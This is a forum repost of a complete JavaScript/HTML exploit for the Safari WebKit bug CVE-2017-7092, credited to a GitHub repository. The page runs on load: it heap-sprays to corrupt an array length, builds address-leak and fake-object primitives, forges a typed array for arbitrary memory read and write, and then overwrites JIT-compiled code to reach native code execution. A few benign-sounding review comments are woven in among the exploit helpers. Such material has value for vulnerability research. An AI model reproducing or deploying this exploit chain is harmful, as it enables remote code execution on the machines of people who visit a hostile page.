Nytro

Safari CVE-2017-7092-Exploit

<html>
<head>
    <script>
    // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218
    big_array = [];
    debug = 0;
    arr = [];
    evil_buffer = {};
    bigarray_buffer_index = 0;
    buffer_arr_index = 0;
    function_to_shellcode = {}
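    function log(txt) {
        // Append one line to the <pre id="d"> debug pane. The text goes in
        // via textContent rather than innerHTML so whatever is logged is
        // rendered literally and never parsed as markup.
        var c = document.createElement("div");
        c.textContent = "log: " + txt;
        d.appendChild(c);
    }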
    function debug_alert(str){
        // No-op unless the page-level `debug` flag is truthy; otherwise the
        // message is shown as an alert and echoed into the log pane.
        if(!debug){
            return;
        }
        alert(str);
        log(str);
    }
    function gc() {
        debug_alert("gc");
        for(i = 0;i < 0x924924;i++){   //0x4924924
            arr[i] = new ArrayBuffer(20);  //54
        }
        debug_alert("gcc");
    }
    function gc2() {
        try {
            var c = document.createElement("canvas");
            var gl = c.getContext("2d");
            for (var i = 0; i < 100; i++) {
                var gggg = gl.createImageData(1, 0x10000/4)
            }
        } catch (e) {
        }
    }
    function make_a_big_hole(){
        g = []
        gg = "g".repeat(0x7fff1000)
        debug_alert("big_hole");
        for(var i = 0; i < 5;i++){
            g[i] = String.prototype.fontsize.call(gg,5);
        }
        debug_alert("after_big_hole");
        for(var i = 0; i < 0x3;i++){
            g[0] = null;  //gc
            //g[1] = null;
            g[2] = null;   //".replace
            g[3] = null;   //hole
        }
        //g = null;
        debug_alert("big_array");
        init_big_array_len = 0x10000000;
        g[2] = new Array(init_big_array_len);
        g[2].fill(1.1);
        debug_alert("after_big_array");
        big_array = g[2];
        //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0));
        //arr2 = []; arr2[0] = evil_float64;
        //heap_feng_shui();
        gg = null;
        gc();
    }
    function make_evil_data(){
        nop = "\x00"
        nop_data = ""
        offset = 0x38 + 0x1e +0x38
        nop_data = nop.repeat(offset/2);
        //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff"
        nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff");
        ff = "\x00"
        ff_data = ff.repeat((0x1000-offset-0x18)/2);
        return nop_data + ff_data;
    }
    function heap_feng_shui(){
        debug_alert("heap_feng_shui");
        arr2 = []
        buffer_arr = []
       /* for(var i = 0;i < 20;i++){
            //arr2[i] = new Array(0x1000);
            buffer_arr[i] = new Float64Array(0x2000001);
           // buffer_arr[i].fill(1.1);  //float64  1.1   ==  array   1.0375
        }*/
        for(var i = 0;i < 0x18000;i++){
            evil_float64 = new Float64Array(new ArrayBuffer(0x8000));
            evil_float64.fill(1.1);
            buffer_arr[i] = evil_float64;
        }
        debug_alert("after_heap_feng_shui");
    }
    function f64tou32(number){
        // Reinterpret the bit pattern of a double as two 32-bit unsigned
        // words: result[0] is the first 4 bytes of the buffer, result[1] the
        // next 4 (word order follows host endianness).
        // NOTE(review): `a`, `b` and `result` are implicit globals, not
        // locals. `a` is also assigned in trigger(), so every call here
        // silently replaces that page-level reference — confirm whether the
        // caller relies on that before converting these to `var`/`let`.
        a = new Float64Array(0x8);
        a.fill(number);
        b = new Uint32Array(a.buffer);
        result = [];
        result[0] = b[0];
        result[1] = b[1];
        return result;
    }
    function u32tof64(arr){
        // Inverse of f64tou32: writes arr[0] and arr[1] into the first two
        // 32-bit slots of a buffer and reads them back as one double.
        // NOTE(review): `a` and `b` are implicit globals here too; `a` is
        // also assigned in trigger() and in f64tou32(), so the three sites
        // overwrite one shared binding — verify that is intended.
        b = new Uint32Array(0x8);
        b[1] = arr[1];
        b[0] = arr[0];
        a = new Float64Array(b.buffer);
        return a[0];
    }
    function read_obj(obj){
        big_array[bigarray_buffer_index] = obj;
        f64_address = buffer_arr[buffer_arr_index][0x50/8];
        uint32 = f64tou32(f64_address);
       // alert(uint32[1].toString(16)+ "  " + uint32[0].toString(16));
        return uint32;
        //alert(uint32[1].toString(16)+ "  " + uint32[0].toString(16));
    }
    function fake_obj(arr_address){
        f64_address = u32tof64(arr_address);
       // alert(f64_address);
        buffer_arr[buffer_arr_index][0x50/8] = f64_address;
       // alert("here");
        return big_array[bigarray_buffer_index];
    }
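    function randomString(){
        // Build an 8-character name from a fixed lowercase alphabet. It is
        // only used to produce distinct property names, so Math.random() is
        // adequate here. Locals replace the implicit globals `chars`,
        // `maxPos`, `result` and `i` the original leaked into page scope.
        var chars = "abcdefghijklmnopq";
        var result = "";
        for(var k = 0; k < 0x8; k++){
            result += chars.charAt(Math.floor(Math.random() * chars.length));
        }
        return result;
    }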
    function sprayFloat64ArrayStru(){
        for(var i = 0; i < 0x1000;i++){
            var a = new Float64Array(1);
            a[randomString()] = 1337;
        }
    }
    function Int64(arr){
        uint32 = [];
        uint32[0] = arr[0];
        uint32[1] = arr[1] - 0x10000;
        f = u32tof64(uint32);
        return f;
    }
    function Int64_add(arr,num){
        // Add num to the low word (arr[0]) in place and hand the same array
        // back. The high word is untouched; no carry is propagated.
        arr[0] += num;
        return arr;
    }
    function read_64(addr){
        f = u32tof64(addr);
        fakearray[0x2] = f;
        result = [];
        result[0] = evil_buffer_array[0];
        result[1] = evil_buffer_array[1];
        //alert(result[1].toString(16)+ "  " + result[0].toString(16));
        return result;
    }
    function write_32(addr,data){
        f = u32tof64(addr);
        fakearray[0x2] = f;
        evil_buffer_array[0] = data;
    }
    function make_jit_function(){
        func_body = "eval('');abc = [];"
        for(i = 0;i<500;i++){
            func_body += "abc[" + i.toString() + "];"
        }
        function_to_shellcode = new Function("a",func_body);
        // alert("here")
        for(i = 0;i < 100; i++){
            function_to_shellcode();
        }
        // alert("here")
    }
    function trigger() {
        //alert(2);
       // make_jit_function();
        evil_data = make_evil_data();
        a = evil_data.repeat(0x7fff0000/0x800);
        z = a.slice(1);
        x = "\"".repeat(0x2aaaaaa0);
        //alert("1");
      //  alert(evil_data.length.toString(16));
        
        make_a_big_hole();
        z = String.prototype.link.call(a,x)
        alert("The Array length is 0x" + big_array.length.toString(16));
        heap_feng_shui();
        //z = null;
        //a = null;
        //x = null;
       // heap_feng_shui();
        //alert("end");
        
        //Array.prototype.slice.call(arr,1);
        //Array.prototype.slice.call(buffer_arr,1);
        t = Array.prototype.slice.call(big_array,0x10000001,0x10000002);
        t = Array.prototype.slice.call(buffer_arr,1,2);
        if(big_array.length != init_big_array_len){
           // alert("Success!The Array length is 0x" + big_array.length.toString(16));
           // alert(big_array[0x1]);
            /*for(var i = 0x10000000;i < big_array.length;i++){
                if(big_array[i] != undefined  && big_array[i] != -1){
                    alert(i.toString(16));
                    alert(big_array[i]);
                }
            }*/
            flag = 0;
            for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){  //0x4a000000
                //alert(i.toString(16));
                if(big_array[i] == 1.0375){
                    alert("find Success");
                    bigarray_buffer_index = i;
                    big_array[bigarray_buffer_index] = 3.3333333;
                    j = 0;
                    while(j<0x18000){
                        if(buffer_arr[j][0x50/8] != 1.1){
                            buffer_arr_index = j;
                            flag = 1;
                            break;
                        }
                        j++;
                    }
                    break;
                }
            }
            if(flag == 0){
                alert("can't find buffer!");
                window.location.reload();
            }
        }
        else{
            alert("can't overwrite the length!");
            window.location.reload();
        }
        //alert(buffer_arr_index);  
        make_jit_function();
        sprayFloat64ArrayStru();
        evil_buffer_array = new Uint32Array(0x1000);
        var jsCellHeader = Int64([0x00001000,0x11827000]);
        var lengthFlags = Int64([0x00000010,0x00010000]);
        var container = {
            jsCell : jsCellHeader,
            butterfly : false,
            vector : evil_buffer_array,
            lengthAndFlags : lengthFlags
        };
        address = Int64_add(read_obj(container),0x10);
        //alert(address[1].toString(16) + "  " + address[0].toString(16));
        fakearray = fake_obj(address);
        //String.prototype.link.call(container);
        while(!(fakearray instanceof Float64Array)){
            i = 1;
            jsCellHeader = Int64([0x00001000+i,0x11827000]);
            container.jsCell = jsCellHeader;
            i++;
        }
        //String.prototype.link.call(fakearray);
       
        
        func_addr = read_obj(function_to_shellcode);
       // alert(func_addr[1].toString(16)+ "  " + func_addr[0].toString(16));
        executableAddr = read_64(Int64_add(func_addr,0x18));
        jitCodeAddr = read_64(Int64_add(executableAddr,0x18));
        codeAddr = read_64(Int64_add(jitCodeAddr,0x20));
        write_32(codeAddr,0xcccccccc);
        //codeAddr = read_64(Int64_add(jitCodeAddr,0x10));
        //write_32(codeAddr,0xcccccccc);
        alert("begin_shellcode!!!!!!");
        function_to_shellcode();
        alert("end");
        
    }
    </script>
</head>
<body onload="trigger()">
<pre id="d">
</pre>
</body>
</html>

Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit

